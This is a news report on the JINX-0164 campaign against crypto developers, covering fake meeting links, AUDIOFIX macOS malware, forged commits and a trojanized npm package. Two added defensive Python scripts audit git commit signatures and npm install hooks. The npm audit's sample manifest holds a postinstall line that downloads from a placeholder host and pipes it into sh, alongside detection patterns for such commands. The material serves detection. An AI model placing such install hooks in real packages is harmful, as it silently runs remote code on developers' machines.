A targeted cyberattack campaign has compromised multiple cryptocurrency developers by impersonating legitimate contacts on LinkedIn and delivering malware through fake meeting links. The group behind these attacks, identified as JINX-0164, deploys custom macOS malware designed to infiltrate development environments and steal critical credentials.
Researchers from cloud security firm Wiz detailed the operation, revealing how JINX-0164 engineers fake meeting invites that lead victims to counterfeit video conferencing interfaces resembling Microsoft Teams. Once a developer clicks the malicious link, AUDIOFIX malware silently installs itself on their device without detection.
AUDIOFIX operates across both Intel and Apple Silicon Macs, posing as a system audio component to maintain persistence and communicate covertly with command servers over HTTPS. The malware exfiltrates a broad range of credentials, including saved passwords from the macOS Keychain, browser logins, SSH keys, cloud platform tokens for AWS, GCP, and Azure, and even sensitive cryptocurrency wallet data.
Unlike typical credential stealers, JINX-0164’s campaign uniquely targets crypto developers’ internal code repositories and continuous integration/continuous deployment (CI/CD) pipelines. Using stolen GitHub tokens, the attackers accessed internal secrets and pushed malicious code into trusted repositories by falsifying Git commit metadata.
This infiltration converts the victim organization’s own software development process into a vector for distributing malware to other developers who clone or build compromised codebases. In one detected incident, GitHub’s Vigilant Mode flagged suspicious commits lacking verified GPG signatures, indicating unauthorized code injections.
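The detection described above (commits that lack a verified signature, plus author/committer metadata that does not match what the organization expects) can be reproduced outside GitHub with ordinary `git log` output. The script below is an added example, not code from the article or from Wiz; the log lines, the trusted domain `example.org`, and the commit hashes are constructed for illustration. Because commit author and committer fields are attacker-controlled and trivially forgeable, the email checks here only prompt review; the signature status (`%G?`) is the one field that cannot be falsified without the signing key.

```python
"""Audit git commits for missing/bad signatures and unexpected author/committer metadata.

Input is the output of:
  git log --format='%H%x1f%G?%x1f%an%x1f%ae%x1f%cn%x1f%ce%x1f%s'
(fields separated by the ASCII unit separator, 0x1f).
"""
from dataclasses import dataclass

SEP = "\x1f"

# Meaning of git's %G? placeholder values.
SIGNATURE_STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature, untrusted key",
    "X": "good signature, expired",
    "Y": "good signature, expired key",
    "R": "good signature, revoked key",
    "E": "signature could not be checked",
    "N": "no signature",
}

# Organization email domains that commits are expected to come from (assumption).
TRUSTED_DOMAINS = {"example.org"}

# Constructed sample log output; hashes and identities are placeholders, not real data.
SAMPLE_LOG = "\n".join([
    SEP.join(["a1a1a1a1a1a1", "G", "Dana Dev", "dana@example.org",
              "Dana Dev", "dana@example.org", "Fix build matrix"]),
    SEP.join(["b2b2b2b2b2b2", "N", "Dana Dev", "dana@example.org",
              "Dana Dev", "dana@example.org", "Update dependencies"]),
    SEP.join(["c3c3c3c3c3c3", "N", "Dana Dev", "dana@example.org",
              "ci-bot", "ci@unrelated.example", "Add helper script"]),
    SEP.join(["d4d4d4d4d4d4", "B", "Ops", "ops@example.org",
              "Ops", "ops@example.org", "Rotate deploy tokens"]),
])


@dataclass
class Commit:
    sha: str
    sig: str
    author_name: str
    author_email: str
    committer_name: str
    committer_email: str
    subject: str


def parse_log(text):
    """Split the unit-separated git log output into Commit records."""
    commits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(SEP)
        if len(parts) != 7:
            raise ValueError(f"unexpected field count in line: {line!r}")
        commits.append(Commit(*parts))
    return commits


def audit_commit(commit, trusted_domains):
    """Return a list of review reasons for one commit (empty list means clean)."""
    reasons = []
    if commit.sig != "G":
        status = SIGNATURE_STATUS.get(commit.sig, f"unknown status {commit.sig!r}")
        reasons.append(f"signature: {status}")
    for role, email in (("author", commit.author_email),
                        ("committer", commit.committer_email)):
        domain = email.rsplit("@", 1)[-1].lower()
        if domain not in trusted_domains:
            reasons.append(f"{role} email outside trusted domains: {email}")
    # Legitimate rebases also produce this, so it is a review prompt, not a verdict.
    if commit.author_email.lower() != commit.committer_email.lower():
        reasons.append("author and committer differ")
    return reasons


def audit_log(text, trusted_domains=TRUSTED_DOMAINS):
    """Map commit sha -> reasons for every commit that needs review."""
    findings = {}
    for commit in parse_log(text):
        reasons = audit_commit(commit, trusted_domains)
        if reasons:
            findings[commit.sha] = reasons
    return findings


if __name__ == "__main__":
    for sha, reasons in audit_log(SAMPLE_LOG).items():
        print(sha, "->", "; ".join(reasons))
```

Running this against a real repository only requires piping the `git log` command from the docstring into `audit_log`; enforcing a branch protection rule that requires signed commits remains the preventive control, with this audit as the retrospective check.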
Further illustrating their reach, JINX-0164 conducted a confirmed supply chain attack on a widely used npm package. A trojanized version injected a hidden command fetching and executing MINIRAT—a Go-based lightweight backdoor enabling persistent, remote control over infected machines.
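A trojanized package that fetches and executes a second stage at install time typically does so from an npm lifecycle hook (`preinstall`, `install`, `postinstall`, `prepare`). The audit below is an added example, not code from the article or from the affected package; it flags lifecycle scripts that reach out to the network, pipe output into a shell or interpreter, evaluate inline code, or decode base64 blobs. Both `package.json` documents are constructed, and `example.invalid` is a placeholder host, not one of the domains named in the article.

```python
"""Flag npm lifecycle scripts that download-and-execute or hide their payload."""
import json
import re

# Hooks npm runs automatically during install/publish (no user interaction).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall",
                   "preprepare", "prepare", "postprepare")

SUSPICIOUS_PATTERNS = {
    "remote fetch": re.compile(r"\b(curl|wget)\b|https?://"),
    "pipe to shell/interpreter": re.compile(r"\|\s*(sh|bash|zsh|node|python3?)\b"),
    "inline eval": re.compile(r"\bnode\s+-e\b|\beval\b"),
    "base64 decode": re.compile(r"base64\s+(-d|--decode)\b|\batob\("),
}

# Constructed sample manifests (not real packages).
CLEAN_PACKAGE = json.dumps({
    "name": "example-clean",
    "version": "1.0.0",
    "scripts": {"build": "tsc -p .", "postinstall": "node scripts/build.js"},
})

TROJANIZED_PACKAGE = json.dumps({
    "name": "example-trojanized",
    "version": "1.0.1",
    "scripts": {
        "build": "tsc -p .",
        "postinstall": "curl -s https://example.invalid/update | sh",
    },
})


def audit_scripts(scripts):
    """Return {hook: [pattern labels]} for lifecycle hooks that match a pattern."""
    findings = {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]
        if hits:
            findings[hook] = hits
    return findings


def audit_package_json(text):
    """Parse a package.json document and audit its lifecycle scripts."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        raise ValueError("package.json 'scripts' must be an object")
    return audit_scripts(scripts)


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_PACKAGE), ("trojanized", TROJANIZED_PACKAGE)):
        print(label, audit_package_json(doc))
```

Pattern matching of this kind catches the obvious download-and-run form; installing with `npm install --ignore-scripts` in CI and reviewing the diff between the lockfile's previous and new package versions before allowing scripts remain the stronger controls.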
The command-and-control infrastructure linked to these attacks shares domains like datahub[.]ink and cloud-sync[.]online, with operators masking their locations using commercial VPN services such as Mullvad, Astrill, and ExpressVPN. While Wiz noted tactical similarities with North Korean threat clusters UNC1069 and Sapphire Sleet, no direct infrastructure connections were found.
This campaign highlights evolving threats in the crypto software ecosystem, where attackers compromise development pipelines not only to steal credentials but to propagate malware widely through trusted coding workflows. Developers are urged to exercise caution with unsolicited meeting requests and enhance code repository security practices, including robust token management and commit verification protocols.

